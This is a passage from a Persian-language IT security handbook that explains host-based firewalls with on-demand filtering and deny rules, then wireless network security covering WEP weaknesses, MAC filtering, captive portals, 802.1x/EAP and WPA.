‫ﺧﺎﺭﺝﺷﻮﻧﺪﻩ‪ ،‬ﺍﻓﺸﺎﻱ ﺗﺼﺎﺩﻓﻲ ﻣﻨﺎﺑﻊ ﺣﻴﺎﺗﻲ ﻭ ﺍﻃﻼﻋﺎﺕ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺳﻴﺴﺘﻢ ﺭﺍ ﻣﺤﺪﻭﺩ ﻣﻲﺳﺎﺯﺩ ﻭ ﺧﺮﺍﺑﻲ ﻧﺎﺷﻲ ﺍﺯ ﺁﻟﻮﺩﻩﺷﺪﻥ ﺩﺳﺘﮕﺎﻩ ﺑﻪ‬
‫ﺗﺮﺍﻭﺍ ﺭﺍ ﻧﻴﺰ ﻛﺎﻫﺶ ﻣﻲﺩﻫﺪ‪ .‬ﺍﻳﻦ ﻋﻤﻞ ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺍﻋﻤﺎﻝ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﺳﺘﻔﺎﺩﺓ ﺻﺤﻴﺢ ﺍﺯ ﺷﺒﻜﻪ ﻛﻤﻚ ﻛﻨﺪ‪ ،‬ﺍﻣﺎ ﻛﺎﺭﺑﺮﺍﻧﻲ ﻛﻪ‬
‫ﻻ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ﺻﺎﻓﻴﻬﺎﻱ ﺧﺮﻭﺟﻲ ﻋﺒﻮﺭ ﻛﻨﻨﺪ‪.‬‬
‫ﺩﺍﻧﺶ ﻛﺎﻓﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ﻣﻌﻤﻮ ﹰ‬
‫ﻳﻜﻲ ﺍﺯ ﭘﻴﺸﺮﻓﺘﻬﺎﻱ ﻣﻬﻢ ﺩﺭ ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ ﻣﺒﺘﻨﻲ ﺑﺮ ﻣﻴﺰﺑﺎﻥ‪ ،‬ﻏﺮﺑﺎﻝﺳﺎﺯﻱ ﻫﻨﮕﺎﻡ ﻧﻴﺎﺯ‪ ٢٦٣‬ﺍﺳﺖ‪ .‬ﺍﮔﺮ ﺷﻤﺎ ﺑﺪﻟﻴﻞ ﻭﺟﻮﺩ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ‬
‫ﺷﻨﺎﺧﺘﻪﺷﺪﻩ‪ ،‬ﺧﺪﻣﺎﺕ ﻣﺨﺘﻠﻒ ﺭﺍ ﺭﻭﻱ ﺭﺍﻳﺎﻧﻪ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭ ﻧﻴﺎﻭﺭﺩﻩﺍﻳﺪ‪ ،‬ﻣﻲﺗﻮﺍﻧﻴﺪ ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﻧﺎﻇﺮ ﺍﺟﺮﺍ ﻛﻨﻴﺪ ﻛﻪ ﭘﻮﺭﺗﻬﺎﻱ ﺍﺳﺘﻔﺎﺩﻩﻧﺸﺪﺓ‬
‫ﻣﻌﻤﻮﻟﻲ ‪ -‬ﻭ ﻳﺎ ﺣﺘﻲ ﺗﻤﺎﻡ ﭘﻮﺭﺗﻬﺎﻱ ﺍﺳﺘﻔﺎﺩﻩﻧﺸﺪﺓ ﭘﺎﻳﻴﻨﺘﺮ ﺍﺯ ‪ - ١٠٢٤‬ﺭﺍ ﺗﺤﺖ ﻧﻈﺮ ﺑﮕﻴﺮﺩ‪ .‬ﺍﮔﺮ ﻣﻴﺰﺑﺎﻥ ﺷﻤﺎ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺧﺒﺮﻱ‬
‫ﻧﺒﺎﺷﺪ ﻭ ﺩﺭ ﻋﻴﻦ ﺣﺎﻝ ﻳﻚ ﻣﻴﺰﺑﺎﻥ ﺭﺍﻩ ﺩﻭﺭ ﺳﻌﻲ ﺩﺭ ﺍﺗﺼﺎﻝ ﺑﻪ ﺳﺮﻭﻳﺲ ‪ NNTP‬ﻣﻴﺰﺑﺎﻥ ﺷﻤﺎ ﻛﻨﺪ ﻭ ﻳﺎ ﺑﺨﻮﺍﻫﺪ ﺍﺯ ﺳﺮﻭﻳﺲ ‪ TFTP‬ﺁﻥ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﺪ‪ ،‬ﺑﺮﻧﺎﻣﺔ ﻧﺎﻇﺮ ﺑﻪ ﺍﻳﻨﺼﻮﺭﺕ ﻭﺍﺭﺩ ﻋﻤﻞ ﻣﻲﺷﻮﺩ ﻛﻪ ﺗﻼﺵ ﺑﺮﺍﻱ ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺛﺒﺖ ﻣﻲﻛﻨﺪ ﻭ ﺁﺩﺭﺱ ‪ IP‬ﺁﻥ ﻣﻴﺰﺑﺎﻥ ﺭﺍﻩ ﺩﻭﺭ ﺭﺍ ﺩﺭ‬
‫ﻳﻚ ﺿﺎﺑﻄﺔ ﻣﻤﺎﻧﻌﺖ‪ ٢٦٤‬ﺑﻪ ‪ tcpwrapper‬ﻣﻲﺍﻓﺰﺍﻳﺪ؛ ﻭ ﻳﺎ ﺑﺮﺍﻱ ﻣﺴﺪﻭﺩ ﻛﺮﺩﻥ ﻫﻤﺔ ﺍﺗﺼﺎﻻﺕ ﺍﺯ ﺳﻮﻱ ﺁﻥ ﻣﻴﺰﺑﺎﻥ‪ ،‬ﻳﻚ ﺿﺎﺑﻄﺔ ﺟﺪﻳﺪ‬
‫ﺑﻪ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﻣﺒﺘﻨﻲ ﺑﺮ ﻣﻴﺰﺑﺎﻥ ﺍﺿﺎﻓﻪ ﻣﻲﻧﻤﺎﻳﺪ‪ .‬ﭼﻨﺎﻧﭽﻪ ﻧﮕﺮﺍﻥ ﻣﺴﺪﻭﺩ ﺷﺪﻥ ﺗﺼﺎﺩﻓﻲ ﻳﻚ ﻣﻴﺰﺑﺎﻥ ﺑﻲﺁﺯﺍﺭ ﻫﺴﺘﻴﺪ‪ ،‬ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﺮﻧﺎﻣﺔ‬

‫‪261 Demilitarized Zone‬‬


‫‪ ۲۶۲‬ﻛﺘﺎﺑﻬﺎﻳﻲ ﻛﻪ ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ ﺑﺴﻴﺎﺭ ﺗﻮﺻﻴﻪ ﻣﻲﺷﻮﻧﺪ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ ﻛﺘﺎﺏ ‪ Bellovin ،Cheswick‬ﻭ ‪ Rubin‬ﺑﻪ ﻧﺎﻡ "ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺸﻴﻦ ﻭ ﺍﻣﻨﻴﺖ ﺍﻳﻨﺘﺮﻧﺖ‪ :‬ﺭﺍﻧﺪﻥ ﻧﻔﻮﺫﮔﺮ‬
‫ﻣﻜﺎﺭ"‪ ،‬ﭼﺎﭖ ﺩﻭﻡ‪ ،‬ﺳﺎﻝ ‪ ،۲۰۰۳‬ﻭ ﻛﺘﺎﺏ ‪ Cooper ،Zwicky‬ﻭ ‪ Chapman‬ﺑﻪ ﻧﺎﻡ "ﺳﺎﺧﺖ ﺩﻳﻮﺍﺭﻫﺎﻱ ﺁﺗﺸﻴﻦ ﺍﻳﻨﺘﺮﻧﺘﻲ"‪ ،‬ﭼﺎﭖ ﺩﻭﻡ‪ ،‬ﺳﺎﻝ ‪.۲۰۰۰‬‬
‫‪263 On-demand Filtering‬‬
‫‪264 Deny Rule‬‬
‫‪٣٩١‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﻧﺎﻇﺮ ﺭﺍ ﻃﻮﺭﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻛﻨﻴﺪ ﻛﻪ ﭘﻴﺶ ﺍﺯ ﻣﺴﺪﻭﺩ ﻛﺮﺩﻥ ﻳﻚ ﻣﻴﺰﺑﺎﻥ ﺭﺍﻩ ﺩﻭﺭ‪ ،‬ﻧﻴﺎﺯ ﺑﻪ ﭼﻨﺪ ﻛﺎﻭﺵ‪ ٢٦٥‬ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ .‬ﺗﻌﺪﺍﺩ ﺯﻳﺎﺩﻱ ﺍﺯ‬
‫ﻧﺎﻇﺮﻫﺎﻱ ﺍﻳﻨﭽﻨﻴﻨﻲ ﻛﻪ ﺑﺎ ﭘﻮﻳﺶ ﺑﻪ ﻳﺎﻓﺘﻦ ﻧﻘﺎﻁ ﺣﻤﻠﻪ ﻣﻲﭘﺮﺩﺍﺯﻧﺪ ﺑﺮﺍﻱ ﺑﺴﺘﺮﻫﺎﻱ ﻣﺨﺘﻠﻒ ﺑﺼﻮﺭﺕ ﺁﺯﺍﺩ ﻭ ﺗﺠﺎﺭﻱ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ‪.‬‬

‫ﺷﺒﻜﻪﻫﺎﻱ ﺑﻲﺳﻴﻢ‬
‫ﻳﻚ ﺍﺳﺘﺮﺍﺗﮋﻱ ﺑﺴﻴﺎﺭ ﺭﺍﻳﺞ ﻭ ﺭﻭ ﺑﻪ ﺭﺷﺪ ﺩﺭ ﺷﺒﻜﻪﺳﺎﺯﻱ ‪ -‬ﺧﺼﻮﺻﹰﺎ ﺩﺭ ﺍﻣﺎﻛﻨﻲ ﻛﻪ ﺍﻳﺠﺎﺩ ﺯﻳﺮﺳﺎﺧﺖ ﺷﺒﻜﻪﺍﻱ ﻫﺰﻳﻨﻪﺑﺮ ﻭ ﻳﺎ ﻧﺎﻣﻤﻜﻦ‬
‫ﻣﻲﺑﺎﺷﺪ ‪ -‬ﺷﺒﻜﻪﺳﺎﺯﻱ ﺑﻲﺳﻴﻢ ﺍﺳﺖ‪ .‬ﺷﺒﻜﻪﻫﺎﻱ ﺑﻲﺳﻴﻢ ﻋﻤﻮﻣﹰﺎ ﺍﺯ ﺍﺳﺘﺎﻧﺪﺍﺭﻫﺎﻱ ‪ 802.11‬ﻣﺆﺳﺴﻪ ‪ IEEE‬ﭘﻴﺮﻭﻱ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﻛﻪ ﺷﺎﻣﻞ‬
‫‪ 802.11a ،802.11b‬ﻭ ‪ 802.11g‬ﻣﻲﺷﻮﺩ‪ ٢٦٦.‬ﺩﺭ ﻳﻚ ﺷﺒﻜﺔ ﺑﻲﺳﻴ ﹺﻢ ﻧﻮﻋﻲ‪ ،‬ﻭﺳﺎﻳﻠﻲ ﺑﻪ ﻧﺎﻡ ﻧﻘﺎﻁ ﺩﺳﺘﺮﺳﻲ ﺑﻲﺳﻴﻢ‪ ٢٦٧‬ﺑﺮﺍﻱ‬
‫ﺩﺭﻳﺎﻓﺖ ﻭ ﺍﻧﺘﻘﺎﻝ ﺩﺍﺩﻩﻫﺎ ﺩﺭ ﻳﻚ ﻣﺤﺪﻭﺩﺓ ﻣﺸﺨﺺ )ﻣﺜ ﹰﻼ ﻳﻚ ﻃﺒﻘﻪ ﺍﺯ ﻳﻚ ﺳﺎﺧﺘﻤﺎﻥ( ﻧﺼﺐ ﻣﻲﺷﻮﻧﺪ‪ .‬ﺍﻳﻦ ﺩﺳﺘﮕﺎﻫﻬﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ‬
‫ﻳﻜﺪﻳﮕﺮ ﻣﺘﺼﻞ ﺑﺎﺷﻨﺪ‪ ،‬ﺍﻣﺎ ﺑﺮﺍﻱ ﻓﺮﺳﺘﺎﺩﻩ ﺷﺪﻥ ﺑﺴﺘﻪﻫﺎ ﺑﻪ ﺧﺎﺭﺝ ﺍﺯ ﺳﺎﺯﻣﺎﻥ‪ ،‬ﺩﺭ ﻧﻬﺎﻳﺖ ﺑﺎﻳﺪ ﺑﻪ ﻣﺴﻴﺮﻳﺎﺑﻬﺎﻱ ﺳﺎﺯﻣﺎﻥ ﻣﺘﺼﻞ ﮔﺮﺩﻧﺪ‪.‬‬
‫ﻣﻼﺣﻈﺎﺕ ﺯﻳﺎﺩﻱ ﺩﺭ ﺑﺮﭘﺎﻳﻲ ﻳﻚ ﺷﺒﻜﺔ ﺑﻲﺳﻴﻢ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ .‬ﺩﺍﺩﻩﻫﺎﻱ ﺭﻭﻱ ﺷﺒﻜﻪ ﺑﺎﻳﺪ ﻣﺤﺮﻣﺎﻧﻪ ﺑﺎﻗﻲ ﺑﻤﺎﻧﻨﺪ؛ ﻳﻌﻨﻲ ﻣﻬﺎﺟﻤﺎﻥ ﻧﺒﺎﻳﺪ ﻗﺎﺩﺭ‬
‫ﺑﻪ ﺍﺳﺘﺮﺍﻕ ﺳﻤﻊ ﺍﻳﻦ ﺩﺍﺩﻩﻫﺎ ﺑﺎﺷﻨﺪ‪ ،‬ﻭ ﺍﺯ ﺁﻥ ﮔﺬﺷﺘﻪ ﻧﺒﺎﻳﺪ ﺑﺘﻮﺍﻧﻨﺪ ﺑﻪ ﺷﺒﻜﺔ ﺑﻲﺳﻴﻢ ﺑﭙﻴﻮﻧﺪﻧﺪ ﻭ ﺍﺯ ﻣﻨﺎﺑﻊ ﺁﻥ )ﻣﺜﻞ ﺍﺗﺼﺎﻝ ﺍﻳﻨﺘﺮﻧﺘﻲ( ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ‬
‫ﻛﻨﻨﺪ‪.‬‬
‫ﻣﺘﺄﺳﻔﺎﻧﻪ ﺷﺒﻜﻪﺳﺎﺯﻱ ﺑﻲﺳﻴﻢ‪ ،‬ﺳﺎﺑﻘﺔ ﺧﻮﺑﻲ ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﻣﻨﻴﺖ ﻧﺪﺍﺭﺩ‪ .‬ﺧﺼﻮﺻﹰﺎ ﺷﺒﻜﻪﻫﺎﻱ ‪ 802.11b‬ﺍﻛﺜﺮﹰﺍ ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺣﻔﺎﻇﺘﻲ ﺑﺴﻴﺎﺭ‬
‫ﻣﺤﺪﻭﺩﻱ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﻨﺪ‪ .‬ﻫﺮﭼﻨﺪ ﻳﻚ ﭘﺮﻭﺗﻜﻞ ﺑﻪ ﻧﺎﻡ ﭘﺮﻭﺗﻜﻞ ﻣﻌﺎﺩﻝ ﺷﺒﻜﻪﻫﺎﻱ ﺳﻴﻤﻲ )‪ ٢٦٨(WEP‬ﺑﺮﺍﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺳﻄﺢ ﺍﺗﺼﺎﻝ‬
‫ﻫﻢﺍﻛﻨﻮﻥ ﮐﺎﺭﺑﺮﺩ ﮔﺴﺘﺮﺩﻩﺍﻱ ﺩﺍﺭﺩ‪ ،‬ﺍﻣﺎ ﻧﺸﺎﻥ ﺩﺍﺩﻩ ﺷﺪﻩ ﻛﻪ ﺍﻳﻦ ﭘﺮﻭﺗﻜﻞ ﺣﺎﻭﻱ ﻳﻚ ﻧﻘﺺ ﺍﺳﺎﺳﻲ ﺍﺳﺖ ﻭ ﻣﻬﺎﺟﻤﺎﻥ ﺑﺎ ﺳﺨﺖﺍﻓﺰﺍﺭ ﻧﺴﺒﺘﹰﺎ‬
‫ﺳﺎﺩﻩﺍﻱ )ﻳﻚ ﺭﺍﻳﺎﻧﺔ ﻛﻴﻔﻲ ﻭ ﻳﻚ ﻛﺎﺭﺕ ﺷﺒﻜﺔ ﺑﻲﺳﻴﻢ( ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﺍﻧﺪﺍﺯﻩﺍﻱ ﺩﺍﺩﻩ ﺑﺪﺳﺖ ﺁﻭﺭﻧﺪ ﻛﻪ ﺑﺘﻮﺍﻧﻨﺪ ﻛﻠﻴﺪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺭﺍ ﻛﺸﻒ ﻭ ﺗﻤﺎﻡ‬
‫ﺩﺍﺩﻩﻫﺎ ﺭﺍ ﺁﺷﻜﺎﺭ ﺳﺎﺯﻧﺪ‪ .‬ﭘﺮﺍﺳﺘﻔﺎﺩﻩﺗﺮﻳﻦ ﺭﻭﺷﻬﺎﻱ ﻛﻨﺘﺮﻝ ﺩﺳﺘﺮﺳﻲ ﻣﺜﻞ ﻏﺮﺑﺎﻝﺳﺎﺯﻱ ‪) MAC‬ﺩﺍﺩﻥ ﺍﺟﺎﺯﺓ ﻭﺭﻭﺩ ﻭ ﺍﺗﺼﺎﻝ ﺗﻨﻬﺎ ﺑﻪ ﻣﺸﺘﺮﻳﺎﻥ‬
‫ﺑﻲﺳﻴﻤﻲ ﻛﻪ ﺁﺩﺭﺳﻬﺎﻱ ﺳﺨﺖﺍﻓﺰﺍﺭﻱ ﺷﻨﺎﺧﺘﻪﺷﺪﻩ ﺩﺍﺭﻧﺪ( ﻧﻴﺰ ﺿﻌﻴﻒ ﻫﺴﺘﻨﺪ‪ ،‬ﭼﺮﺍﻛﻪ ‪ MAC‬ﺑﻪ ﺳﺎﺩﮔﻲ ﻗﺎﺑﻞ ﺗﺸﺨﻴﺺ ﻭ ﺗﻐﻴﻴﺮ ﺍﺳﺖ‪ .‬ﺍﮔﺮﭼﻪ ﻓﻌﺎﻝ‬
‫ﻛﺮﺩﻥ ﻫﻤﺔ ﺍﻳﻦ ﺍﻣﻜﺎﻧﺎﺕ ﺍﻣﻨﻴﺘﻲ ‪ -‬ﻭ ﻫﻤﭽﻨﻴﻦ ﺗﻐﻴﻴﺮ ﻣﻘﺪﺍﺭ ﭘﻴﺶﻓﺮﺽ ‪SSID‬ﻫﺎ ﻭ ﺧﺎﻣﻮﺵ ﻛﺮﺩﻥ ﭘﺨﺶ ﻋﻤﻮﻣﻲ ‪ - SSID‬ﻣﻲﺗﻮﺍﻧﺪ‬
‫ﺑﻪ ﺑﺮﻗﺮﺍﺭﻱ ﺳﻄﺢ ﺑﺎﻻﺗﺮﻱ ﺍﺯ ﺍﻣﻨﻴﺖ ﻛﻤﻚ ﻛﻨﺪ‪ ،‬ﺍﻣﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻫﻤﺔ ﺁﻧﻬﺎ ﺩﺭﮐﻨﺎﺭ ﻫﻢ ﻧﻴﺰ ﻣﻨﺠﺮ ﺑﻪ ﺍﻳﺠﺎﺩ ﻳﻚ ﺷﺒﻜﺔ ﺑﻲﺳﻴﻢ ﺍﻳﻤﻦ‬
‫ﻧﻤﻲﺷﻮﺩ‪.‬‬
‫ﺩﺭ ﺷﺒﻜﻪﻫﺎﻱ ﻗﺪﻳﻤﻲﺗ ﹺﺮ ‪ ،802.11b‬ﻣﺤﺮﻣﺎﻧﮕﻲ ﺗﻨﻬﺎ ﺑﺎ ﺍﻟﺰﺍﻡ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫﺎ ﺑﻪ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺍﻧﺘﻬﺎ ﺑﻪ ﺍﻧﺘﻬﺎ ﺑﺮﺍﻱ ﺍﺗﺼﺎﻻﺕ‬
‫)ﻣﺜﻞ ﺳﻴﺴﺘﻤﻬﺎﻱ ‪ VPN‬ﻳﺎ ‪ (SSH‬ﺑﺪﺳﺖ ﻣﻲﺁﻳﺪ ﻭ ﻛﻨﺘﺮﻝ ﺩﺳﺘﺮﺳﻲ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻭﺵ ‪ captive portal‬ﻣﺪﻳﺮﻳﺖ ﺷﻮﺩ‪ .‬ﺩﺭ‬
‫ﺍﻳﻦ ﺳﻴﺴﺘﻢ ﻳﻚ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ )ﻛﻪ ﺑﻄﻮﺭ ﺍﻳﺪﻩﺁﻝ ﺩﺭ ﻫﻤﺔ ﻧﻘﺎﻁ ﺩﺳﺘﺮﺳﻲ ﻋﻤﻞ ﻣﻲﻛﻨﺪ(‪ ،‬ﺗﻤﺎﻡ ﺗﺮﺍﻓﻴﻚ ﺗﺼﺪﻳﻖﻫﻮﻳﺖﻧﺸﺪﻩ ﺭﺍ ﻣﺴﺪﻭﺩ ﻣﻲﻛﻨﺪ‪ ،‬ﺑﺠﺰ‬
‫ﺗﺮﺍﻓﻴﻜﻲ ﻛﻪ ﺑﻪ ﺑﺮﻧﺎﻣﺔ ‪ portal‬ﻣﻲﺭﻭﺩ‪ ،‬ﻭ ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪ ﻣﺴﺌﻮﻟﻴﺖ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺍﻳﻤﻦ ﻛﺎﺭﺑﺮﺍﻥ ﻭ ﺍﻃﻼﻉ ﺑﻪ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺑﺮﺍﻱ ﺩﺍﺩﻥ ﺍﺟﺎﺯﺓ‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﻋﺒﻮﺭ ﺑﻪ ﺑﺴﺘﻪﻫﺎﻱ ﻣﺎﺷﻴﻦ ﺗﺄﻳﻴﺪﺷﺪﻩ ﺩﺭ ﻳﻚ ﺑﺎﺯﺓ ﺯﻣﺎﻧﻲ ﻣﺤﺪﻭﺩ ﺭﺍ ﺑﺮﻋﻬﺪﻩ ﺩﺍﺭﺩ‪.‬‬


‫ﻳﻚ ﺭﻭﺵ ﺍﻣﻦﺗﺮ ﺩﺭ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ‪ IEEE 802.1x‬ﻋﻨﻮﺍﻥ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﻭﺳﺎﻳﻞ ﺑﻲﺳﻴﻤﻲ ﻛﻪ ﺍﺯ ﺍﻳﻦ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﭘﻴﺮﻭﻱ ﻣﻲﻛﻨﻨﺪ ﭘﺮﻭﺗﻜﻞ‬
‫ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺗﻮﺳﻌﻪﭘﺬﻳﺮ )‪ ٢٦٩(EAP‬ﺭﺍ ﺑﺮﺍﻱ ﺗﺒﺎﺩﻝ ﺩﺍﺩﻩﻫﺎﻱ ﺗﺼﺪﻳﻖﻫﻮﻳﺖﺷﺪﻩ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻨﺪ‪ .‬ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫﺎﻱ‬
‫ﺑﻲﺳﻴﻢ ﺩﺭ ﺣﺎﻟﺖ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖﻧﺸﺪﻩ ﺷﺮﻭﻉ ﺑﻪ ﻛﺎﺭ ﻣﻲﻛﻨﻨﺪ ﻭ ﺩﺭ ﺍﻳﻨﺤﺎﻟﺖ ﺗﻨﻬﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺴﺘﻪﻫﺎﻱ ‪ EAP‬ﺍﻭﻟﻴﻪ ﺭﺍ ﺍﺭﺳﺎﻝ ﻧﻤﺎﻳﻨﺪ‪ .‬ﻧﻘﻄﺔ‬
‫ﺩﺳﺘﺮﺳﻲ ﺑﺎ ﻳﻚ ﺩﺭﺧﻮﺍﺳﺖ ﺑﺮﺍﻱ ﻫﻮﻳﺖ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﺑﻪ ﺁﻥ ﺑﺴﺘﺔ ‪ EAP‬ﺍﻭﻟﻴﻪ ﭘﺎﺳﺦ ﻣﻲﺩﻫﺪ‪ ،‬ﻭ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﻧﻴﺰ ﺍﻳﻨﺒﺎﺭ ﻫﻮﻳﺖ ﺧﻮﺩ‬
‫ﻻ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻧﻮﻋﻲ ‪ TLS‬ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻣﻲﺷﻮﺩ‪ .‬ﻧﻘﻄﺔ‬ ‫ﺭﺍ ﺍﺭﺳﺎﻝ ﻣﻲﻧﻤﺎﻳﺪ‪ .‬ﺍﻳﻦ ﻣﻜﺎﻟﻤﻪ ﺭﻭﻱ ﻳﻚ ﻛﺎﻧﺎﻝ ﺍﻣﻦ ﺻﻮﺭﺕ ﻣﻲﭘﺬﻳﺮﺩ ﻛﻪ ﻣﻌﻤﻮ ﹰ‬

‫‪265 Probe‬‬
‫‪ ۲۶۶‬ﺳﺎﻳﺮ ﻭﺳﺎﻳﻞ ﺑﻲﺳﻴﻢ ﻣﺎﻧﻨﺪ ﺗﻠﻔﻨﻬﺎﻱ ﻫﻤﺮﺍﻩ ﻭ ‪PDA‬ﻫﺎ ﺍﺯ ﺷﺒﻜﻪﻫﺎﻱ ﺗﻠﻔﻦ ﻫﻤﺮﺍﻩ ‪ GSM‬ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨـﺪ‪ .‬ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﻣـﺸﻜﻼﺕ ‪ 802.11‬ﮔﺮﻳﺒـﺎﻧﮕﻴﺮ ﺷـﺒﻜﻪﻫـﺎﻱ‬
‫‪ GSM‬ﻧﻴﺰ ﻫﺴﺘﻨﺪ‪ .‬ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﺑﻪ ﻛﺘﺎﺏ ﺯﻳﺮ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ‪" :‬ﻣﺪﻳﺮﻳﺖ ﻣﺨﺎﻃﺮﺍﺕ ﺳﻴﺎﺭ‪ :‬ﺍﻣﻮﺭ ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭ ﻣﺤﻴﻄﻬـﺎﻱ ﺑـﻲﺳـﻴﻢ" ﺳـﺎﻝ ‪ ،۲۰۰۲‬ﻧﻮﺷـﺘﺔ‬
‫‪ Tom Kellermann‬ﺑﺮﺍﻱ ﺑﺎﻧﻚ ﺟﻬﺎﻧﻲ‪www.worldbank1.org/finance :‬‬
‫‪267 Wireless Access Points‬‬
‫‪268 Wired Equivalent Protocol‬‬
‫‪269 Extensible Authentication Protocol‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٣٩٢‬‬

‫ﺩﺳﺘﺮﺳﻲ ﻫﻮﻳﺖ ﺭﺍ ﺗﺼﺪﻳﻖ ﻣﻲﻛﻨﺪ ﻭ ﺣﺎﻟﺖ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﺭﺍ ﺑﻪ "ﺗﺼﺪﻳﻖﺷﺪﻩ" ﺗﻐﻴﻴﺮ ﻣﻲﺩﻫﺪ‪ ،‬ﻳﻚ ﻛﻠﻴﺪ ‪ WEP‬ﺍﻭﻟﻴﻪ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺩﺭ‬
‫ﺭﻣﺰﮔﺬﺍﺭﻱ ﺩﺍﺩﻩﻫﺎﻱ ﺑﻲﺳﻴﻢ ﻣﻲﻓﺮﺳﺘﺪ‪ ،‬ﻭ ﺩﺭ ﻃﻮﻝ ﺍﺗﺼﺎﻝ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﺪ ﺍﻳﻦ ﻛﻠﻴﺪ ﺭﺍ ﺗﻐﻴﻴﺮ ﺩﻫﺪ‪ .‬ﺑﺎ ﺗﻐﻴﻴﺮ ﺩﺍﺩﻥ ﻫﺮ ﺍﺯ ﭼﻨﺪﮔﺎﻩ ﻛﻠﻴﺪﻫﺎ‪ ،‬ﺍﺯ‬
‫ﺑﺮﻭﺯ ﺣﻤﻼﺗﻲ ﻛﻪ ﺑﺮ ﮔﺮﻓﺘﻦ ﺗﻌﺪﺍﺩ ﺯﻳﺎﺩﻱ ﺑﺴﺘﻪ ﺑﺎ ﻛﻠﻴﺪ ﻳﻜﺴﺎﻥ ‪ WEP‬ﺗﻜﻴﻪ ﺩﺍﺭﺩ ﺟﻠﻮﮔﻴﺮﻱ ﻣﻲﺷﻮﺩ‪.‬‬
‫ﺩﺳﺘﺮﺳﻲ ﺣﻔﺎﻇﺖﺷﺪﺓ ‪ ٢٧٠(WPA) Wi-Fi‬ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺟﺪﻳﺪﺗﺮﻱ ﺍﺳﺖ ﮐﻪ ﻳﻚ ﺳﻴﺴﺘﻢ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺑﻬﺘﺮ ﺍﺯ ‪ WEP‬ﻭ ﻧﻴﺰ ﻗﺎﺑﻠﻴﺖ ﺗﺼﺪﻳﻖ‬
